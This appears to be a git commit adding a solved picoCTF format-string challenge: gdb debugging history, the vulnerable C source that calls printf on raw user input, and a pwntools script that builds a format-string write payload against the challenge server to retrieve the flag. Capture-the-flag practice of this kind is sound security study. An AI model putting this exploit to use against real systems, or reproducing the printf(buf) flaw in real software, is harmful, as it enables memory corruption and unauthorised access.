diff --git a/format_string_2/.gdb_history b/format_string_2/.gdb_history new file mode 100644 index 0000000..28b50a2 --- /dev/null +++ b/format_string_2/.gdb_history @@ -0,0 +1,217 @@ +disassemble main +b *main+75 +run +exit +disams main +disasm +disams main +disasm main +disassemble main +b *main+75 +run +n +n +n +n +stack +stack 10 +stack 20 +stack 40 +search 0x21737573 +search \x21\x73\x75\x73 +search -dword 0x21737573 +search --dword 0x21737573 +search --dword 0x00404060 +search --qword 0x0000000000404060 +disassemble main +stack 40 +stack 60 +search --dword 0x21737573 +run +continue +run +stack 40 +stack 60 +continue +run +search --dword 0x21737573 +continue +run +continue +run +disassemble main +exit +disassemble main +exit +disassemble main +b *main+95 +run +stack 60 +help x +stack 60 +x 1xg 0x7fffffffbc70 +x 1x 0x7fffffffbc70 +x 0x7fffffffbc70 +x 0x7fffffffbc70 +2x 0x7fffffffbc70 +x2 0x7fffffffbc70 +x 2 0x7fffffffbc70 +x /2 0x7fffffffbc70 +x /1xg 0x7fffffffbc70 +n +x /1xg 0x7fffffffbc70A +continue +continue +run +exit +b *main+95 +run +x /1xg 0x7fffffffbc70A +stack +stack 60 +x /1xg 0x7fffffffbc70 +continue +run +stack +stack 60 +x /1xg 0x7fffffffbc70 +continue +run +stack 60 +continue +exit +python import sys +python print(sys.path) +exit +exit +exit +exit +exit +exit +exit +exit +exit +exit +disassemble main +b *main+95 +run +stack 40 +continue +disassemble main +run +stack 40 +continue +search b570 +find b570 +run +stack 40 +continue +info +exit +disassemble main +b *main+95 +run +stack 40 +continue +run +stack 40 +continue +run +n +stack 40 +exit +disassemble main +b *main+95 +run +n +x/1x +x/2xw 0x7fffffffb570 +x/xw 0x7fffffffb570 +x 0x7fffffffb570 +continue +run +x 0x7fffffffb570 +n +x 0x7fffffffb570 +continue +run +stack 60 +continue +run +stack 60 +n +continue +run +stack 20 +continue +run +stack +stack20 +stack 20 +continue +run +stack 20 +continue +run +exit +b *main+95 +run < python print(b"\x60\x40\x40\x00") +run < python -c "print(b"\x60\x40\x40\x00")" +run < python3 -c "print(b"\x60\x40\x40\x00")" +exit +b *main+95 +run < pipe +exit +b *main+95 +run < pipe +continue +exit +b *main+95 +run < pipe +stack 20 +x 0x404060 +n +x 0x404060 +exit +b *main+95 +run +stack 20 +n +exit +exit +b *main+95 +run +run < pipe +x 0x404060 +n +x 0x404060 +stack 20 +continue +exit +b *main+95 +run +run < pipe +disassemble main +x 0x404060 +x 0x7fffffffba00 +x $rip +x $rip+0x2de7 +x 0x401273+0x2de7 +x 0x401279+0x2de7 +stack 40 +continue +run +stack 40 +n +run < pipe +stack 20 +continue +run < pipe +stack 20 +continue +run < pipe +stack 20 +continue +run < pipe +stack 20 +exit diff --git a/format_string_2/peda-session-vuln.txt b/format_string_2/peda-session-vuln.txt new file mode 100644 index 0000000..fe91fea --- /dev/null +++ b/format_string_2/peda-session-vuln.txt @@ -0,0 +1,2 @@ +break *main+95 + diff --git a/format_string_2/sol.py b/format_string_2/sol.py new file mode 100755 index 0000000..60eb32f --- /dev/null +++ b/format_string_2/sol.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python3 +from pwn import * + +context.arch = "amd64" + +address = "rhea.picoctf.net" +port = 51393 +conn = remote(address, port) + +def send_payload(payload): + conn = remote(address, port) + log.info(f"payload: {repr(payload)}") + conn.sendline(payload) + return conn.recvall() + +format_string = FmtStr(send_payload) +offset = format_string.offset + +payload = fmtstr_payload(offset, {0x404060: 0x67616c66}) +log.info(payload) +conn.sendline(payload) + +flag = conn.recvall() +log.success(flag) diff --git a/format_string_2/vuln b/format_string_2/vuln new file mode 100755 index 0000000..c73077a Binary files /dev/null and b/format_string_2/vuln differ diff --git a/format_string_2/vuln.c b/format_string_2/vuln.c new file mode 100644 index 0000000..2e2b2c7 --- /dev/null +++ b/format_string_2/vuln.c @@ -0,0 +1,35 @@ +#include + +int sus = 0x21737573; + +int main() { + char buf[1024]; + char flag[64]; + + + printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n"); + fflush(stdout); + scanf("%1024s", buf); + printf("Here's your input: "); + printf(buf); + printf("\n"); + fflush(stdout); + + if (sus == 0x67616c66) { + printf("I have NO clue how you did that, you must be a wizard. Here you go...\n"); + + // Read in the flag + FILE *fd = fopen("flag.txt", "r"); + fgets(flag, 64, fd); + + printf("%s", flag); + fflush(stdout); + } + else { + printf("sus = 0x%x\n", sus); + printf("You can do better!\n"); + fflush(stdout); + } + + return 0; +}